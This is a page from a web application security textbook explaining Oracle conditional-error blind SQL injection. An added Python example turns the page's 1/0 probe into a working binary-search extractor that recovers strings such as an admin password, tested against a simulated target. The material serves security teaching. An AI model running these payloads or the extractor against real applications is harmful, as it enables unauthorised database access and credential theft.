The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws
282    Chapter 9    Injecting Code
An example of this is the following query, which tests whether the default Oracle user DBSNMP exists. If this user exists, the WHERE condition is true, the expression 1/0 is evaluated, and an error results:

SELECT 1/0 FROM dual WHERE (SELECT username FROM all_users WHERE
username = 'DBSNMP') = 'DBSNMP'

The following query tests whether an invented user AAAAAA exists. Because the WHERE condition is never true, the expression 1/0 is not evaluated, and so no error occurs:

SELECT 1/0 FROM dual WHERE (SELECT username FROM all_users WHERE
username = 'AAAAAA') = 'AAAAAA'

What this technique achieves is a way of inducing a conditional response within the application, even in cases where the query you are injecting has no impact on the application's logic or data processing. It therefore enables you to use the inference techniques described previously to extract data in a very wide range of situations. Further, because of the technique's simplicity, the same attack strings will work on a range of databases and where the injection point is into various types of SQL statement. Two practical caveats: the metadata names are database-specific (all_users and dual are Oracle's), and not every database raises an error on division by zero (MySQL, for example, returns NULL from SELECT 1/0), so on such platforms a different error-inducing expression must be substituted for 1/0.
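The following Python is an added example, not code from the book: it builds the page's 1/0 probe for Oracle and then drives the inference loop the text refers to, recovering a string one character at a time by binary search on ASCII(SUBSTR(...)) using only an error/no-error signal. The `send` callback stands in for whatever delivers the payload (an HTTP request) and returns True when the response shows a database error; `fake_send`, `FAKE_USERS`, `FAKE_SECRET` and the inner `users` query are constructed stand-ins for the target so the block runs offline.

```python
"""Conditional-error inference against an Oracle back end (added example).

Probe shape from the page: 1/0 sits in the SELECT list and is only
evaluated when the WHERE clause is true, so a database error means
"condition true" and a clean response means "condition false".
"""
import re


def probe(condition):
    """Wrap an arbitrary boolean SQL condition in the page's 1/0 probe."""
    return f"SELECT 1/0 FROM dual WHERE ({condition})"


def user_exists(username):
    """The page's own test: does a row for `username` exist in all_users?"""
    return probe(
        f"(SELECT username FROM all_users WHERE username = '{username}') "
        f"= '{username}'"
    )


def char_gt(inner, pos, value):
    """Error iff the pos-th character of inner's single-row result has an
    ASCII code greater than `value`. SUBSTR past the end yields NULL, and
    NVL maps that to 0 so the search can detect the end of the string."""
    return probe(f"NVL(ASCII(SUBSTR(({inner}), {pos}, 1)), 0) > {value}")


def extract(inner, send, max_len=64):
    """Recover the string returned by `inner` using only send() -> bool.

    Each character costs seven probes (binary search over 0..127)."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127  # invariant: the true ASCII code lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if send(char_gt(inner, pos, mid)):  # error => code > mid
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # NVL(..., 0): we ran past the end of the string
            break
        out.append(chr(lo))
    return "".join(out)


# --- constructed stand-in for the target; a real engagement replaces this
# with a function that sends the payload and inspects the HTTP response.
FAKE_USERS = {"SYS", "SYSTEM", "DBSNMP"}          # pretend all_users
FAKE_SECRET = "P@ss1"                              # pretend inner-query result


def fake_send(payload):
    """Answer a probe the way the simulated Oracle instance would."""
    m = re.search(r"NVL\(ASCII\(SUBSTR\(\(.*\), (\d+), 1\)\), 0\) > (\d+)", payload)
    if m:
        pos, value = int(m.group(1)), int(m.group(2))
        code = ord(FAKE_SECRET[pos - 1]) if pos <= len(FAKE_SECRET) else 0
        return code > value  # True == "database error observed"
    m = re.search(r"all_users WHERE username = '([^']*)'", payload)
    if m:
        return m.group(1) in FAKE_USERS
    return False


if __name__ == "__main__":
    print(user_exists("DBSNMP"), "->", fake_send(user_exists("DBSNMP")))
    print(user_exists("AAAAAA"), "->", fake_send(user_exists("AAAAAA")))
    # Hypothetical inner query; the table and column are assumptions.
    print(extract("SELECT password FROM users WHERE name = 'admin'", fake_send))
```

The binary search keeps the request count predictable (seven per character plus seven to detect the end), which matters when every probe is a logged application error; NVL is what turns "no more characters" into a distinguishable answer rather than a NULL comparison that never errors.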
